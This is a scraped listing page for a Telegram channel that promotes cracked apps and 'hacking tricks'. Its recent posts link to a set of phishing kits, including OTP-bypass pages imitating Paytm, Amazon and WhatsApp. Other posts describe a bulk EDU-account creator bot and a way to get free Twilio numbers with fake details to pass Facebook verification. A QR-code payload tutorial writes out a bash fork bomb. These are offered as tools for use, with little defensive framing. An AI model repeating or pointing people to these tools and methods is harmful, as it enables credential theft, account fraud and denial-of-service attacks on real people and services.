🔥 Burn Fat Fast. Discover How! 💪

Pirates of playstore

Logo of telegram channel hackorld — Pirates of playstore P
Logo of telegram channel hackorld — Pirates of playstore
Channel address: @hackorld
Categories: Apps
Language: English
Subscribers: 1.30K
Description from channel

♻️ WE UPDATE MODED APPS EVERYDAY 🤩
🔰 ALL CRACKED APPS
🔰 NETFLIX MOD
🔰 HACKING TRICKS
🔰 FREE COURSES
🔰 GAME MODS
For help @Pspiratesbot

Ratings & Reviews

3.50

2 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

0

4 stars

1

3 stars

1

2 stars

0

1 stars

0


The latest Messages 6

2021-07-03 11:44:23 EDU Mail Creator - Updated

Steps:

Enter How many Accounts you want (Tip: do not chose over 90k)
Chose Captcha or Manually
Chose The College
The Bot Will Open New tab firefox - chrome - any browser you have .
It will enter the information automatically you need enter the captcha manually
817 viewsVashu, 08:44
Open / Comment
2021-07-03 11:43:57
769 viewsVashu, 08:43
Open / Comment
2021-07-03 11:42:40 Phishing Tool Links

Modern phishing tool hidden eye
Link :https://github.com/DarkSecDevelopers/HiddenEye

complete phishing tool 32 templates + 1 customizable
Link :https://github.com/thelinuxchoice/blackeye

social media phishing with shellphish
Link : https://github.com/thelinuxchoice/shellphish

Advance Phishing OTP Bypass
Link : https://github.com/Ignitetch/AdvPhishing

Paytm Phishing OTP Bypass
Link : https://github.com/Ignitetch/Paytm-Phishing

UberEats Phishing OTP Bypass
Link : https://github.com/Ignitetch/UberEats-Phishing

Whats App Phishing
Link : https://github.com/Ignitetch/whatsapp-phishing

Zomato Phishing
Link : https://github.com/Ignitetch/Zomato-Phishing

hotstar OTP Bypass
Link : https://github.com/Ignitetch/Hotstar-otp-bypass

Ola OTP Bypass
Link ::-)https://github.com/Ignitetch/ola-otpbypass

Amazon Payment Gateway Phishing
Link : https://github.com/Ignitetch/Amazon-payment-gateway-phishing
779 viewsVashu, 08:42
Open / Comment
2021-07-03 11:41:07 ​​Why are local disks in computers labelled with alphabets C, D, E and not with A and B?

Have you seen a floppy? Floppies were a type of disk storage used earlier, before the current system of storage came into existence. Floppy disk drives were named with the letters A and B. When hard disk drives became standard in most computers, they were logically labelled 'C' since the first two letters were already used for these floppy drives. Though floppy disk drives are no longer widely used, hard disks are still labelled from 'C' onwards.
641 viewsVashu, 08:41
Open / Comment
2021-07-03 11:40:52 Create free UNLIMITED phone numbers [No TextNow or TextPlus] Works for FB, IG, Twitter..

Step 1. Go to Twilio . Com
Step 2. Click on “Get free API key”
Step 3. Sign up with a disposable o real email, enter fake contact details if you want.
Step 4. Receive confirmation email and verify.
Step 5. Verify a number, I think you can put a TextNow number but I recommend putting yours because you can reuse it if you want to make another account.
Step 5. It will ask you if you can code, just say yes.
Step 6. Then, it will ask you why are you using Twilio for, choose “Send and receive sms”
Step 6. Choose JavaScript as your programming language.
Step 7. Get a trial number.
Step 8. Input your trial number on FB phone verification.
Important Step: To see your messages go to the top right corner of your screen, and you will see a bug Icon, click on it and then “Go to debugger”
https://imgur.com/gallery/0yUvWAG

Then you will see the events like this
https://imgur.com/gallery/AdxU6W6

Now click the most recent one, and it will show you a report like this
https://imgur.com/a/kHMV2Bo
Then click on Parameters and BOOM.
https://imgur.com/a/PmhGgd9

You will see the message on the body section

If you want to change the number you can do so by letting go of your current number and “buying” another one, strangely Twilio doesn’t have a payment method so it’s free.

Enjoy
642 viewsVashu, 08:40
Open / Comment
2021-07-03 11:39:47
JavaScript.

The Complete Guide Everything you need to know about Promises in JavaScript.

Link : https://mega.nz/folder/r18SlK5A#XujjU4f3Fgd8bdhxeCg7-g
552 viewsVashu, 08:39
Open / Comment
2021-07-03 11:36:27 Not All QR Codes Are Wise to Scan

QR codes can encode a lot of information, and as we've learned today, they can even be formatted to cause a device to perform actions like connecting to a Wi-Fi network. That makes scanning a QR code risky, as a person has no way of reading the information before exposing your device to whatever payload is contained inside. If you scan a QR code that seems suspicious, pay attention to what the code is attempting to launch, and do not connect to a Wi-Fi network or navigate to a link that's shortened.
While most QR codes should be safe to scan on a smartphone, scanning payloads we generated today on a device for scanning tickets or boarding passes may result in some bizarre behavior from the device. Do not scan payloads on a scanner you need working immediately after for an event or work — or any scanner you do not have permission to test — as some of these payloads may cause the scanner to stop working.
527 viewsVashu, 08:36
Open / Comment
2021-07-03 11:36:22
498 viewsVashu, 08:36
Open / Comment
2021-07-03 11:36:02 Step 3
Encode Custom Payloads

To encode a custom payload, we can first create a text file containing what we want to encode. Each line will be a new payload. First, we can create a next text file by typing nano badstuff.txt to create a text file.

~/QRGen/genqr$ nano badstuff.txt
In that text file, we can put our payload. The one below is a fork bomb. Will it work on a QR code scanner? Who knows.
:(){ :|: & };:


We can save it by pressing Control X, then hit Y and Enter to confirm your save. Now, you should see a text file containing your payload.

~/QRGen/genqr$ ls badstuff.txt payload-18.png payload-27.png payload-36.png payload-45.png payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png payload-15.png payload-24.png payload-33.png payload-42.png payload-16.png payload-25.png payload-34.png payload-43.png payload-17.png payload-26.png payload-35.png payload-44.png


To write your payload to a QR code, we'll use the -w flag. Assuming your payload file is called "badstuff.txt," the command to do so should look like below (remember to change back to the QRGen directory beforehand).


~/QRGen/genqr$ cd .. ~/QRGen$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt' e88 88e 888 88e e88'Y88 d888 888b 888 888D d888 'Y ,e e, 888 8e C8888 8888D 888 88" C8888 eeee d88 88b 888 88b Y888 888P 888 b, Y888 888P 888 , 888 888 "88 88" 888 88b, "88 88" "YeeP" 888 888 b 8b, QRGen ~ v0.1 ~ by h0nus Payload path exist, continuing... Path already cleared or deleted.. Generated 1 payloads! Opening last generated payload... Thanks for using QRGen, made by H0nus..

For my fork bomb payload, it generates the QR code below, which will pop up.
501 viewsVashu, 08:36
Open / Comment
2021-07-03 11:35:40 To see the rest of your payloads, you can type cd genqr to change to the directory where they are created and ls its contents.

~/QRGen$ cd genqr ~/QRGen/genqr$ ls payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png payload-15.png payload-24.png payload-33.png payload-42.png payload-16.png payload-25.png payload-34.png payload-43.png payload-17.png payload-26.png payload-35.png payload-44.png payload-18.png payload-27.png payload-36.png payload-45.png
441 viewsVashu, 08:35
Open / Comment